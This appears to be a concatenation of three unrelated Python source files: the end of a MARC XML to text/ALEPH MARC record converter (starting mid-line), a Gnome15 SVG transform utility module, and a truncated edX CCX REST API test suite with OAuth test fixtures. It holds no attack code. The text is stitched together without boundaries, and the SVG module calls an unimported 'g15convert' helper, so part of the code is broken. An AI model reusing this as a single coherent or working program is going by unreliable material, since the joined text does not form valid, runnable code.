the line data subfield_label = "" subfield_value = "" if len(field[0]) == 0 and field[3] != "": ## this is a controlfield if fieldname not in ("001", "002", "003", "004", \ "005", "006", "007", "008", "009"): subfield_label = "$$_" else: subfield_label = "" subfield_value = "%(subfield_value)s" % { 'subfield_value' : field[3] } field_instance_line_segments.append([subfield_label, subfield_value]) else: ## this should be a datafield: for subfield in field[0]: subfield_label = """$$%(subfield_code)s""" \ % { 'subfield_code' : subfield[0] } subfield_value = """%(subfield_value)s""" \ % { 'subfield_value' : subfield[1] } field_instance_line_segments.append([subfield_label, \ subfield_value]) field_lines.append(field_instance_line_segments) return field_lines def get_sysno_from_record(record, options): """Function to get the system number for a record. In the case of a pure text MARC record being created, the sysno will be retrieved from 001 (i.e. the 'recid' will be returned). In the case of an Aleph MARC record being created, the sysno will be retrieved from 970__a IF this field exists. If not, None will be returned. @param record: the internal representation of the record (created by bibrecord) from which the sysno is to be retrieved. @param options: various options about the record to be created, as obtained from the command line. @return: a string containing a 9-digit SYSNO, -OR- None in certain cases for an Aleph MARC record. """ if options["text-marc"] != 0: vals001 = record_get_field_values(rec=record, tag="001") if len(vals001) > 1: ## multiple values for recid is illegal! sysno = None elif len(vals001) < 1: ## no value for recid is illegal! sysno = None else: ## get recid sysno = vals001[0] if len(sysno) < 9: sysno = "0"*(9-len(sysno)) + sysno else: vals970a = record_get_field_values(rec=record, tag="970", code="a") if len(vals970a) > 1: ## multiple SYS is illegal - return a list of them all, ## let other functions decide what to do return vals970a if len(vals970a) < 1: ## no SYS sysno = None else: ## get SYS sysno = vals970a[0][0:9] return sysno def recxml2recmarc(xmltext, options, sysno_generator=get_sysno_generator()): """The function that processes creating the records from an XML string, and prints these records to the standard output stream. @param xmltext: An XML MARC record in string form. @param options: Various options about the record to be created, as passed from the command line. @param sysno_generator: A static parameter to act as an Aleph system number generator. Do not provide a value for this - it will be assigned upon first call to this function. """ rec_count = 0 ## Counter used to record the number of the rec ## that is being processed. Used in error messages ## for the user, when a record cannot be processed ## create internal records structure from xmltext: records = create_records(xmltext, 1, 1) ## now loop through each record, get its sysno, and convert it: for rec_tuple in records: rec_count += 1 ## Get the record-dictionary itself from the record-tuple: record = rec_tuple[0] if record is None: ## if the record is None, there was probably a problem ## with the MARC XML. Display a warning message on stderr and ## move past this record: sys.stderr.write("E: Unable to process record number %s; The XML " \ " may be broken for this record.\n" \ % str(rec_count)) continue ## From the record, get the SYS if running in ALEPH-MARC mode, or ## the recid (001) if running in TEXT-MARC mode: sysno = get_sysno_from_record(record, options) if sysno is None: ## No 'sysno' was found in the record: if options["text-marc"] == 1: ## 'sysno' (001) (which is actually the recid) is mandatory ## for the creation of TEXT-MARC. Report the error and skip ## past the record: sys.stderr.write("E: Record number %s has no 'recid' (001). " \ "This field is mandatory for the " \ "creation of TEXT MARC. The record has been " \ "skipped.\n" % str(rec_count)) continue elif options["aleph-marc"] == 1 and \ 1 in (options["append-mode"], options["delete-mode"], \ options["correct-mode"], options["replace-mode"]): ## When creating ALEPH-MARC that will be used to manipulate ## a record in some way (i.e. correct, append, delete, replace), ## the ALEPH SYS (970__a in MARC XML) is mandatory. Report the ## error and skip past the record: sys.stderr.write("E: Record number %s has no ALEPH 'SYS' " \ "(970__a). This field is mandatory for the " \ "creation of ALEPH MARC that is used for the" \ " manipulation of records (i.e. replace, " \ "correct, append, delete). The record has " \ "been skipped.\n" % str(rec_count)) continue elif options["aleph-marc"] == 1 and type(sysno) in (list, tuple): ## multiple values for SYS (970__a) in ALEPH-MARC mode are not ## permitted. Report the error and skip past the record: sys.stderr.write("E: Multiple values have been found for the " \ "ALEPH SYS (970__a) in record number %s. This " \ "is not permitted when running in ALEPH-MARC " \ "mode. The record has been skipped." \ % str(rec_count)) continue if options["aleph-marc"] == 1 and options["insert-mode"] == 1: ## Creating an ALEPH "insert" record. Since the resulting record ## should be treated as a new insert into ALEPH, any 'sysno' that ## may have been found in the MARC XML record cannot be used - ## that would be dangerous. Therefore, set 'sysno' to None and ## create a random sysno: sysno = None try: sysno = sysno_generator.next() except StopIteration: ## generator counter has overstepped the MAX ALEPH SYS! ## Without a SYS, we cannot create ALEPH MARC sys.stderr.write("""E: Maximum ALEPH SYS has been """ \ """reached - unable to continue.\n""") sys.exit(1) ## No problems were encountered with SYS or recid. Display the ## translated record: rec_out = create_marc_record(record, sysno, options) sys.stdout.write(rec_out) sys.stdout.flush() def usage(exitcode=1, wmsg=""): """Prints usage info.""" if wmsg: sys.stderr.write("Error: %s.\n" % wmsg) sys.stderr.write ("""\ Usage: %s [options] marcxml_record_file Convert an XML MARC record file to text MARC; Print to standard output stream Command options: --text-marc \t\t\tProduce text MARC output (default) --aleph-marc=[a, d, i, c, r] \tProduce a ALEPH MARC output When running in --aleph-marc mode, provide one of the following values: \ta \t\t\t\tCreate an ALEPH "append" record \td \t\t\t\tCreate an ALEPH "delete" record \ti \t\t\t\tCreate an ALEPH "insert" record \tc \t\t\t\tCreate an ALEPH "correct" record \tr \t\t\t\tCreate an ALEPH "replace" record General options: -h, --help \t\t\t Print this help. -V, --version\t\t\t Print version information. """ % (basename(sys.argv[0]),)) sys.exit(exitcode) def get_cli_options(): """Get the various arguments and options from the command line and populate a dictionary of cli_options. @return: (tuple) of 2 elements. First element is a dictionary of cli options and flags, set as appropriate; Second element is a list of cli arguments. """ try: opts, args = getopt.getopt(sys.argv[1:], "hV", [ "help", "version", "text-marc", "aleph-marc="]) except getopt.GetoptError, err: usage(1, err) options = { "append-mode" : 0, "insert-mode" : 0, "delete-mode" : 0, "replace-mode" : 0, "correct-mode" : 0, "aleph-marc" : 0, "text-marc" : 0 } for opt, arg in opts: if opt in ["-h", "--help"]: ## Display usage (help) message and exit successfully: usage(0) elif opt in ["-V", "--version"]: ## Display version on stdout and exit successfully: sys.stdout.write("%s\n" % __revision__) sys.exit(0) elif opt == "--aleph-marc": ## Running in ALEPH-MARC mode: options["aleph-marc"] = 1 if arg == "a": ## Create an ALEPH "APPEND" record: options["append-mode"] = 1 elif arg == "d": ## Create an ALEPH "DELETE" record: options["delete-mode"] = 1 elif arg == "i": ## Create an ALEPH "INSERT" record: options["insert-mode"] = 1 elif arg == "c": ## Create an ALEPH "CORRECT" record: options["correct-mode"] = 1 elif arg == "r": ## Create an ALEPH "REPLACE" record: options["replace-mode"] = 1 else: ## Invalid option for ALEPH-MARC mode. ## Display usage (help) message and exit with failure: usage(1) elif opt == "--text-marc": ## Running in TEXT-MARC mode: options["text-marc"] = 1 else: ## Invalid option. Display an error message to the user, ## display usage (help) message, and exit with failure: sys.stderr.write("Bad option, %s\n" % opt) usage(1) if options["aleph-marc"] + options["text-marc"] > 1: ## User has specified both ALEPH-MARC and TEXT-MARC modes. ## This is not permitted, display error message, usage message, and ## exit with failure: err_msg = "Choose either aleph-marc mode or text-marc mode - not both." usage(1, err_msg) elif options["aleph-marc"] + options["text-marc"] == 0: ## User has not specified whether to run in ALEPH-MARC or TEXT-MARC ## mode. Run in the default TEXT-MARC mode. options["text-marc"] = 1 if options["aleph-marc"] == 1: ## Running in ALEPH-MARC mode. Conduct some final ALEPH-MODE-specific ## checks: if options["append-mode"] + options["insert-mode"] \ + options["delete-mode"] + options["replace-mode"] \ + options["correct-mode"] != 1: ## Invalid option for ALEPH-MARC mode. ## Display error message, usage info, and exit with failure. err_msg = "A valid mode must be supplied for aleph-marc" usage(1, err_msg) if 1 in (options["insert-mode"], options["replace-mode"]) and \ CFG_ORGANIZATION_IDENTIFIER.strip() == "": ## It is ILLEGAL to create an ALEPH-MARC mode INSERT or ## REPLACE record if the organization's identifier is not known. ## Write out an error mesage and exit with failure. sys.stderr.write("Error: ***CFG_ORGANIZATION_IDENTIFIER IS NOT " \ "SET!*** Unable to create ALEPH INSERT or " \ "REPLACE records. Please inform your %s" \ " Administrator.\n" % CFG_SITE_NAME) sys.exit(1) ## Check that a filename for the MARC XML file was provided: if len(args) == 0: ## No arguments, therefore no XML file. Display a ## usage message, and exit with failure: err_msg = "" usage(1) return (options, args) def main(): """Main function.""" ## process CLI options/arguments: (options, args) = get_cli_options() ## Read in the XML file and process it: xmlfile = args[0] ## open file: try: xmltext = open(xmlfile, 'r').read() except IOError: sys.stderr.write("Error: File %s not found.\n\n" % xmlfile) usage(1) ## Process record conversion: recxml2recmarc(xmltext=xmltext, options=options)
# Gnome15 - Suite of tools for the Logitech G series keyboards and headsets # Copyright (C) 2010 Brett Smith <[email protected]> # Copyright (C) 2013 Nuno Araujo <[email protected]> # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. ''' SVG utilities ''' import cairo import g15pythonlang # Logging import logging logger = logging.getLogger(__name__) def rotate_element(element, degrees): transforms = get_transforms(element) if len(transforms) > 0: t = transforms[0] for i in range(1, len(transforms)): t = t.multiply(transforms[i]) else: t = cairo.Matrix() t.rotate(g15convert.degrees_to_radians(degrees)) ts = "m" + str(t)[7:] element.set("transform", ts) def get_transforms(element, position_only = False): transform_val = element.get("transform") list = [] if transform_val != None: start = 0 while True: start_args = transform_val.find("(", start) if start_args == -1: break name = transform_val[:start_args].lstrip() end_args = transform_val.find(")", start_args) if end_args == -1: break args = transform_val[start_args + 1:end_args].split(",") if name == "translate": list.append(cairo.Matrix(1.0, 0.0, 0.0, 1.0, float(args[0]), float(args[1]))) elif name == "matrix": if position_only: list.append(cairo.Matrix(float(args[0]), float(args[1]), float(args[2]), float(args[3]),float(args[4]),float(args[5]))) else: list.append(cairo.Matrix(1, 0, 0, 1, float(args[4]),float(args[5]))) elif name == "scale": list.append(cairo.Matrix(float(args[0]), 0.0, 0.0, float(args[1]), 0.0, 0.0)) else: logger.warning("Unsupported transform %s", name) start = end_args + 1 return list def get_location(element): list = [] while element != None: x = element.get("x") y = element.get("y") if x != None and y != None: list.append((float(x), float(y))) transform_val = element.get("transform") if transform_val != None: start = 0 while True: start_args = transform_val.find("(", start) if start_args == -1: break name = transform_val[:start_args].lstrip() end_args = transform_val.find(")", start_args) if end_args == -1: logger.warning("Unexpected end of transform arguments") break args = g15pythonlang.split_args(transform_val[start_args + 1:end_args]) if name == "translate": list.append((float(args[0]), float(args[1]))) elif name == "matrix": list.append((float(args[4]),float(args[5]))) else: logger.warning("WARNING: Unsupported transform %s", name) start = end_args + 1 element = element.getparent() list.reverse() x = 0 y = 0 for i in list: x += i[0] y += i[1] return (x, y) def get_actual_bounds(element, relative_to = None): id = element.get("id") bounds = get_bounds(element) transforms = [] t = cairo.Matrix() t.translate(bounds[0],bounds[1]) transforms.append(t) # If the element is a clip path and the associated clipped_node is provided, the work out the transforms from # the parent of the clipped_node, not the clip itself if relative_to is not None: element = relative_to.getparent() while element != None: transforms += get_transforms(element, position_only=True) element = element.getparent() transforms.reverse() if len(transforms) > 0: t = transforms[0] for i in range(1, len(transforms)): t = t.multiply(transforms[i]) xx, yx, xy, yy, x0, y0 = t return x0, y0, bounds[2], bounds[3] def get_bounds(element): x = 0.0 y = 0.0 w = 0.0 h = 0.0 v = element.get("x") if v != None: x = float(v) v = element.get("y") if v != None: y = float(v) v = element.get("width") if v != None: w = float(v) v = element.get("height") if v != None: h = float(v) return (x, y, w, h)
""" Tests for the CCX REST APIs. """ import json import math import string import urllib import urlparse from datetime import timedelta from itertools import izip import ddt import mock from ccx_keys.locator import CCXLocator from django.conf import settings from django.contrib.auth.models import User from django.core.urlresolvers import Resolver404, resolve, reverse from django.utils.timezone import now from nose.plugins.attrib import attr from oauth2_provider import models as dot_models from opaque_keys.edx.keys import CourseKey from provider.constants import CONFIDENTIAL from provider.oauth2.models import Client, Grant from rest_framework import status from rest_framework.test import APITestCase from courseware import courses from lms.djangoapps.ccx.api.v0 import views from lms.djangoapps.ccx.models import CcxFieldOverride, CustomCourseForEdX from lms.djangoapps.ccx.overrides import override_field_for_ccx from lms.djangoapps.ccx.tests.utils import CcxTestCase from lms.djangoapps.ccx.utils import ccx_course as ccx_course_cm from lms.djangoapps.ccx.utils import get_course_chapters from lms.djangoapps.instructor.access import allow_access, list_with_level from lms.djangoapps.instructor.enrollment import enroll_email, get_email_params from student.models import CourseEnrollment from student.roles import CourseCcxCoachRole, CourseInstructorRole, CourseStaffRole from student.tests.factories import AdminFactory, UserFactory USER_PASSWORD = 'test' AUTH_ATTRS = ('auth', 'auth_header_oauth2_provider') class CcxRestApiTest(CcxTestCase, APITestCase): """ Base class with common methods to be used in the test classes of this module """ @classmethod def setUpClass(cls): super(CcxRestApiTest, cls).setUpClass() def setUp(self): """ Set up tests """ super(CcxRestApiTest, self).setUp() # add some info about the course for easy access self.master_course_key = self.course.location.course_key self.master_course_key_str = unicode(self.master_course_key) # OAUTH2 setup # create a specific user for the application self.app_user = app_user = UserFactory( username='test_app_user', email='[email protected]', password=USER_PASSWORD ) # add staff role to the app user CourseStaffRole(self.master_course_key).add_users(app_user) # adding instructor to master course. instructor = UserFactory() allow_access(self.course, instructor, 'instructor') # FIXME: Testing for multiple authentication types in multiple test cases is overkill. Stop it! self.auth, self.auth_header_oauth2_provider = self.prepare_auth_token(app_user) self.course.enable_ccx = True self.mstore.update_item(self.course, self.coach.id) # making the master course chapters easily available self.master_course_chapters = get_course_chapters(self.master_course_key) def get_auth_token(self, app_grant, app_client): """ Helper method to get the oauth token """ token_data = { 'grant_type': 'authorization_code', 'code': app_grant.code, 'client_id': app_client.client_id, 'client_secret': app_client.client_secret } token_resp = self.client.post(reverse('oauth2:access_token'), data=token_data, format='multipart') self.assertEqual(token_resp.status_code, status.HTTP_200_OK) token_resp_json = json.loads(token_resp.content) return '{token_type} {token}'.format( token_type=token_resp_json['token_type'], token=token_resp_json['access_token'] ) def prepare_auth_token(self, user): """ creates auth token for users """ # create an oauth client app entry app_client = Client.objects.create( user=user, name='test client', url='http://localhost//', redirect_uri='http://localhost//', client_type=CONFIDENTIAL ) # create an authorization code app_grant = Grant.objects.create( user=user, client=app_client, redirect_uri='http://localhost//' ) # create an oauth2 provider client app entry app_client_oauth2_provider = dot_models.Application.objects.create( name='test client 2', user=user, client_type='confidential', authorization_grant_type='authorization-code', redirect_uris='http://localhost:8079/complete/edxorg/' ) # create an authorization code auth_oauth2_provider = dot_models.AccessToken.objects.create( user=user, application=app_client_oauth2_provider, expires=now() + timedelta(weeks=1), scope='read write', token='16MGyP3OaQYHmpT1lK7Q6MMNAZsjwF' ) auth_header_oauth2_provider = "Bearer {0}".format(auth_oauth2_provider) auth = self.get_auth_token(app_grant, app_client) return auth, auth_header_oauth2_provider def expect_error(self, http_code, error_code_str, resp_obj): """ Helper function that checks that the response object has a body with the provided error """ self.assertEqual(resp_obj.status_code, http_code) self.assertIn('error_code', resp_obj.data) self.assertEqual(resp_obj.data['error_code'], error_code_str) def expect_error_fields(self, expected_field_errors, resp_obj): """ Helper function that checks that the response object has a body with the provided field errors """ self.assertEqual(resp_obj.status_code, status.HTTP_400_BAD_REQUEST) self.assertIn('field_errors', resp_obj.data) # restructure the error dictionary for a easier comparison resp_dict_error = {} for field_name, error_dict in resp_obj.data['field_errors'].iteritems(): resp_dict_error[field_name] = error_dict.get('error_code', '') self.assertEqual(expected_field_errors, resp_dict_error) @attr(shard=1) @ddt.ddt class CcxListTest(CcxRestApiTest): """ Test for the CCX REST APIs """ ENABLED_SIGNALS = ['course_published'] @classmethod def setUpClass(cls): super(CcxListTest, cls).setUpClass() def setUp(self): """ Set up tests """ super(CcxListTest, self).setUp() self.list_url = reverse('ccx_api:v0:ccx:list') self.list_url_master_course = urlparse.urljoin( self.list_url, '?master_course_id={0}'.format(urllib.quote_plus(self.master_course_key_str)) ) @ddt.data(*AUTH_ATTRS) def test_authorization(self, auth_attr): """ Test that only the right token is authorized """ auth_list = [ "Wrong token-type-obviously", "Bearer wrong token format", "Bearer wrong-token", "Bearer", "Bearer hfbhfbfwq398248fnid939rh3489fh39nd4m34r9" # made up token ] # all the auths in the list fail to authorize for auth in auth_list: resp = self.client.get(self.list_url_master_course, {}, HTTP_AUTHORIZATION=auth) self.assertEqual(resp.status_code, status.HTTP_401_UNAUTHORIZED) resp = self.client.get(self.list_url_master_course, {}, HTTP_AUTHORIZATION=getattr(self, auth_attr)) self.assertEqual(resp.status_code, status.HTTP_200_OK) def test_authorization_no_oauth_staff(self): """ Check authorization for staff users logged in without oauth """ # create a staff user staff_user = UserFactory( username='test_staff_user', email='[email protected]', password=USER_PASSWORD ) # add staff role to the staff user CourseStaffRole(self.master_course_key).add_users(staff_user) data = { 'master_course_id': self.master_course_key_str, 'max_students_allowed': 111, 'display_name': 'CCX Test Title', 'coach_email': self.coach.email } # the staff user can perform the request self.client.login(username=staff_user.username, password=USER_PASSWORD) resp = self.client.get(self.list_url_master_course) self.assertEqual(resp.status_code, status.HTTP_200_OK) resp = self.client.post(self.list_url, data, format='json') self.assertEqual(resp.status_code, status.HTTP_201_CREATED) def test_authorization_no_oauth_instructor(self): """ Check authorization for instructor users logged in without oauth """ # create an instructor user instructor_user = UserFactory( username='test_instructor_user', email='[email protected]', password=USER_PASSWORD ) # add instructor role to the instructor user CourseInstructorRole(self.master_course_key).add_users(instructor_user) data = { 'master_course_id': self.master_course_key_str, 'max_students_allowed': 111, 'display_name': 'CCX Test Title', 'coach_email': self.coach.email } # the instructor user can perform the request self.client.login(username=instructor_user.username, password=USER_PASSWORD) resp = self.client.get(self.list_url_master_course) self.assertEqual(resp.status_code, status.HTTP_200_OK) resp = self.client.post(self.list_url, data, format='json') self.assertEqual(resp.status_code, status.HTTP_201_CREATED) def test_authorization_no_oauth(self): """ Check authorization for coach users logged in without oauth """ # create an coach user coach_user = UserFactory( username='test_coach_user', email='[email protected]', password=USER_PASSWORD ) # add coach role to the coach user CourseCcxCoachRole(self.master_course_key).add_users(coach_user) data = { 'master_course_id': self.master_course_key_str, 'max_students_allowed': 111, 'display_name': 'CCX Test Title', 'coach_email': self.coach.email } # the coach user cannot perform the request: this type of user can only get her own CCX self.client.login(username=coach_user.username, password=USER_PASSWORD) resp = self.client.get(self.list_url_master_course) self.assertEqual(resp.status_code, status.HTTP_403_FORBIDDEN) resp = self.client.post(self.list_url, data, format='json') self.assertEqual(resp.status_code, status.HTTP_403_FORBIDDEN) @ddt.data(*AUTH_ATTRS) def test_get_list_wrong_master_course(self, auth_attr): """ Test for various get requests with wrong master course string """ # mock the permission class these cases can be tested mock_class_str = 'openedx.core.lib.api.permissions.IsMasterCourseStaffInstructor.has_permission' with mock.patch(mock_class_str, autospec=True) as mocked_perm_class: mocked_perm_class.return_value = True # case with no master_course_id provided resp = self.client.get(self.list_url, {}, HTTP_AUTHORIZATION=getattr(self, auth_attr)) self.expect_error(status.HTTP_400_BAD_REQUEST, 'master_course_id_not_provided', resp) base_url = urlparse.urljoin(self.list_url, '?master_course_id=') # case with empty master_course_id resp = self.client.get(base_url, {}, HTTP_AUTHORIZATION=getattr(self, auth_attr)) self.expect_error(status.HTTP_400_BAD_REQUEST, 'course_id_not_valid', resp) # case with invalid master_course_id url = '{0}invalid_master_course_str'.format(base_url) resp = self.client.get(url, {}, HTTP_AUTHORIZATION=getattr(self, auth_attr)) self.expect_error(status.HTTP_400_BAD_REQUEST, 'course_id_not_valid', resp) # case with inexistent master_course_id url = '{0}course-v1%3Aorg_foo.0%2Bcourse_bar_0%2BRun_0'.format(base_url) resp = self.client.get(url, {}, HTTP_AUTHORIZATION=getattr(self, auth_attr)) self.expect_error(status.HTTP_404_NOT_FOUND, 'course_id_does_not_exist', resp) @ddt.data(*AUTH_ATTRS) def test_get_list(self, auth_attr): """ Tests the API to get a list of CCX Courses """ # there are no CCX courses resp = self.client.get(self.list_url_master_course, {}, HTTP_AUTHORIZATION=getattr(self, auth_attr)) self.assertIn('count', resp.data) # pylint: disable=no-member self.assertEqual(resp.data['count'], 0) # pylint: disable=no-member # create few ccx courses num_ccx = 10 for _ in xrange(num_ccx): self.make_ccx() resp = self.client.get(self.list_url_master_course, {}, HTTP_AUTHORIZATION=getattr(self, auth_attr)) self.assertEqual(resp.status_code, status.HTTP_200_OK) self.assertIn('count', resp.data) # pylint: disable=no-member self.assertEqual(resp.data['count'], num_ccx) # pylint: disable=no-member self.assertIn('results', resp.data) # pylint: disable=no-member self.assertEqual(len(resp.data['results']), num_ccx) # pylint: disable=no-member @ddt.data(*AUTH_ATTRS) def test_get_sorted_list(self, auth_attr): """ Tests the API to get a sorted list of CCX Courses """ # create few ccx courses num_ccx = 3 for _ in xrange(num_ccx): self.make_ccx() # update the display_name fields all_ccx = CustomCourseForEdX.objects.all() all_ccx = all_ccx.order_by('id') self.assertEqual(len(all_ccx), num_ccx) title_str = 'Title CCX {0}' for num, ccx in enumerate(all_ccx): ccx.display_name = title_str.format(string.ascii_lowercase[-(num + 1)]) ccx.save() # sort by display name url = '{0}&order_by=display_name'.format(self.list_url_master_course) resp = self.client.get(url, {}, HTTP_AUTHORIZATION=getattr(self, auth_attr)) self.assertEqual(resp.status_code, status.HTTP_200_OK) self.assertEqual(len(resp.data['results']), num_ccx) # pylint: disable=no-member # the display_name should be sorted as "Title CCX x", "Title CCX y", "Title CCX z" for num, ccx in enumerate(resp.data['results']): # pylint: disable=no-member self.assertEqual(title_str.format(string.ascii_lowercase[-(num_ccx - num)]), ccx['display_name']) # add sort order desc url = '{0}&order_by=display_name&sort_order=desc'.format(self.list_url_master_course) resp = self.client.get(url, {}, HTTP_AUTHORIZATION=getattr(self, auth_attr)) # the only thing I can check is that the display name is in alphabetically reversed order # in the same way when the field has been updated above, so with the id asc for num, ccx in enumerate(resp.data['results']): # pylint: disable=no-member self.assertEqual(title_str.format(string.ascii_lowercase[-(num + 1)]), ccx['display_name']) @ddt.data(*AUTH_ATTRS) def test_get_paginated_list(self, auth_attr): """ Tests the API to get a paginated list of CCX Courses """ # create some ccx courses num_ccx = 357 for _ in xrange(num_ccx): self.make_ccx() page_size = settings.REST_FRAMEWORK.get('PAGE_SIZE', 10) num_pages = int(math.ceil(num_ccx / float(page_size))) # get first page resp = self.client.get(self.list_url_master_course, {}, HTTP_AUTHORIZATION=getattr(self, auth_attr)) self.assertEqual(resp.status_code, status.HTTP_200_OK) self.assertEqual(resp.data['count'], num_ccx) # pylint: disable=no-member self.assertEqual(resp.data['num_pages'], num_pages) # pylint: disable=no-member self.assertEqual(resp.data['current_page'], 1) # pylint: disable=no-member self.assertEqual(resp.data['start'], 0) # pylint: disable=no-member self.assertIsNotNone(resp.data['next']) # pylint: disable=no-member self.assertIsNone(resp.data['previous']) # pylint: disable=no-member # get a page in the middle url = '{0}&page=24'.format(self.list_url_master_course) resp = self.client.get(url, {}, HTTP_AUTHORIZATION=getattr(self, auth_attr)) self.assertEqual(resp.status_code, status.HTTP_200_OK) self.assertEqual(resp.data['count'], num_ccx) # pylint: disable=no-member self.assertEqual(resp.data['num_pages'], num_pages) # pylint: disable=no-member self.assertEqual(resp.data['current_page'], 24) # pylint: disable=no-member self.assertEqual(resp.data['start'], (resp.data['current_page'] - 1) * page_size) # pylint: disable=no-member self.assertIsNotNone(resp.data['next']) # pylint: disable=no-member self.assertIsNotNone(resp.data['previous']) # pylint: disable=no-member # get last page url = '{0}&page={1}'.format(self.list_url_master_course, num_pages) resp = self.client.get(url, {}, HTTP_AUTHORIZATION=getattr(self, auth_attr)) self.assertEqual(resp.status_code, status.HTTP_200_OK) self.assertEqual(resp.data['count'], num_ccx) # pylint: disable=no-member self.assertEqual(resp.data['num_pages'], num_pages) # pylint: disable=no-member self.assertEqual(resp.data['current_page'], num_pages) # pylint: disable=no-member self.assertEqual(resp.data['start'], (resp.data['current_page'] - 1) * page_size) # pylint: disable=no-member self.assertIsNone(resp.data['next']) # pylint: disable=no-member self.assertIsNotNone(resp.data['previous']) # pylint: disable=no-member # last page + 1 url = '{0}&page={1}'.format(self.list_url_master_course, num_pages + 1) resp = self.client.get(url, {}, HTTP_AUTHORIZATION=getattr(self, auth_attr)) self.assertEqual(resp.status_code, status.HTTP_404_NOT_FOUND) @ddt.data( ( {}, status.HTTP_400_BAD_REQUEST, 'master_course_id_not_provided', 'auth_header_oauth2_provider' ), ( {}, status.HTTP_400_BAD_REQUEST, 'master_course_id_not_provided', 'auth' ), ( {'master_course_id': None}, status.HTTP_400_BAD_REQUEST, 'master_course_id_not_provided', 'auth_header_oauth2_provider' ), ( {'master_course_id': None}, status.HTTP_400_BAD_REQUEST, 'master_course_id_not_provided', 'auth' ), ( {'master_course_id': ''}, status.HTTP_400_BAD_REQUEST, 'course_id_not_valid', 'auth_header_oauth2_provider' ), ( {'master_course_id': ''}, status.HTTP_400_BAD_REQUEST, 'course_id_not_valid', 'auth' ), ( {'master_course_id': 'invalid_master_course_str'}, status.HTTP_400_BAD_REQUEST, 'course_id_not_valid', 'auth' ), ( {'master_course_id': 'invalid_master_course_str'}, status.HTTP_400_BAD_REQUEST, 'course_id_not_valid', 'auth_header_oauth2_provider' ), ( {'master_course_id': 'course-v1:org_foo.0+course_bar_0+Run_0'}, status.HTTP_404_NOT_FOUND, 'course_id_does_not_exist', 'auth' ), ( {'master_course_id': 'course-v1:org_foo.0+course_bar_0+Run_0'}, status.HTTP_404_NOT_FOUND, 'course_id_does_not_exist', 'auth_header_oauth2_provider' ), ) @ddt.unpack def test_post_list_wrong_master_course(self, data, expected_http_error, expected_error_string, auth_attr): """ Test for various post requests with wrong master course string """ # mock the permission class these cases can be tested mock_class_str = 'openedx.core.lib.api.permissions.IsMasterCourseStaffInstructor.has_permission' with mock.patch(mock_class_str, autospec=True) as mocked_perm_class: mocked_perm_class.return_value = True # case with no master_course_id provided resp = self.client.post(self.list_url, data, format='json', HTTP_AUTHORIZATION=getattr(self, auth_attr)) self.expect_error(expected_http_error, expected_error_string, resp) @ddt.data(*AUTH_ATTRS) def test_post_list_wrong_master_course_special_cases(self, auth_attr): """ Same as test_post_list_wrong_master_course, but different ways to test the wrong master_course_id """ # case with ccx not enabled for master_course_id self.course.enable_ccx = False self.mstore.update_item(self.course, self.coach.id) data = {'master_course_id': self.master_course_key_str} resp = self.client.post(self.list_url, data, format='json', HTTP_AUTHORIZATION=getattr(self, auth_attr)) self.expect_error(status.HTTP_403_FORBIDDEN, 'ccx_not_enabled_for_master_course', resp) self.course.enable_ccx = True self.mstore.update_item(self.course, self.coach.id) # case with deprecated master_course_id with mock.patch('courseware.courses.get_course_by_id', autospec=True) as mocked: mocked.return_value.id.deprecated = True resp = self.client.post(self.list_url, data, format='json', HTTP_AUTHORIZATION=getattr(self, auth_attr)) self.expect_error(status.HTTP_400_BAD_REQUEST, 'deprecated_master_course_id', resp) @ddt.data( ( {}, { 'max_students_allowed': 'missing_field_max_students_allowed', 'display_name': 'missing_field_display_name', 'coach_email': 'missing_field_coach_email' }, 'auth' ), ( {}, { 'max_students_allowed': 'missing_field_max_students_allowed', 'display_name': 'missing_field_display_name', 'coach_email': 'missing_field_coach_email' }, 'auth_header_oauth2_provider' ), ( { 'max_students_allowed': 10, 'display_name': 'CCX Title' }, { 'coach_email': 'missing_field_coach_email' }, 'auth' ), ( { 'max_students_allowed': 10, 'display_name': 'CCX Title' }, { 'coach_email': 'missing_field_coach_email' }, 'auth_header_oauth2_provider' ), ( { 'max_students_allowed': None, 'display_name': None, 'coach_email': None }, { 'max_students_allowed': 'null_field_max_students_allowed', 'display_name': 'null_field_display_name', 'coach_email': 'null_field_coach_email' }, 'auth' ), ( { 'max_students_allowed': None, 'display_name': None, 'coach_email': None }, { 'max_students_allowed': 'null_field_max_students_allowed', 'display_name': 'null_field_display_name', 'coach_email': 'null_field_coach_email' }, 'auth_header_oauth2_provider' ), ( { 'max_students_allowed': 10, 'display_name': 'CCX Title', 'coach_email': 'this is not an [email protected]' }, {'coach_email': 'invalid_coach_email'}, 'auth' ), ( { 'max_students_allowed': 10, 'display_name': 'CCX Title', 'coach_email': 'this is not an [email protected]' }, {'coach_email': 'invalid_coach_email'}, 'auth_header_oauth2_provider' ), ( { 'max_students_allowed': 10, 'display_name': '', 'coach_email': '[email protected]' }, {'display_name': 'invalid_display_name'}, 'auth' ), ( { 'max_students_allowed': 10, 'display_name': '', 'coach_email': '[email protected]' }, {'display_name': 'invalid_display_name'}, 'auth_header_oauth2_provider' ), ( { 'max_students_allowed': 'a', 'display_name': 'CCX Title', 'coach_email': '[email protected]' }, {'max_students_allowed': 'invalid_max_students_allowed'}, 'auth' ), ( { 'max_students_allowed': 'a', 'display_name': 'CCX Title', 'coach_email': '[email protected]' }, {'max_students_allowed': 'invalid_max_students_allowed'}, 'auth_header_oauth2_provider' ), ( { 'max_students_allowed': 10, 'display_name': 'CCX Title', 'coach_email': '[email protected]', 'course_modules': {'foo': 'bar'} }, {'course_modules': 'invalid_course_module_list'}, 'auth' ), ( { 'max_students_allowed': 10, 'display_name': 'CCX Title', 'coach_email': '[email protected]', 'course_modules': {'foo': 'bar'} }, {'course_modules': 'invalid_course_module_list'}, 'auth_header_oauth2_provider' ), ( { 'max_students_allowed': 10, 'display_name': 'CCX Title', 'coach_email': '[email protected]', 'course_modules': 'block-v1:org.0+course_0+Run_0+type@chapter+block@chapter_1' }, {'course_modules': 'invalid_course_module_list'}, 'auth' ), ( { 'max_students_allowed': 10, 'display_name': 'CCX Title', 'coach_email': '[email protected]', 'course_modules': 'block-v1:org.0+course_0+Run_0+type@chapter+block@chapter_1' }, {'course_modules': 'invalid_course_module_list'}, 'auth_header_oauth2_provider' ), ( { 'max_students_allowed': 10, 'display_name': 'CCX Title', 'coach_email': 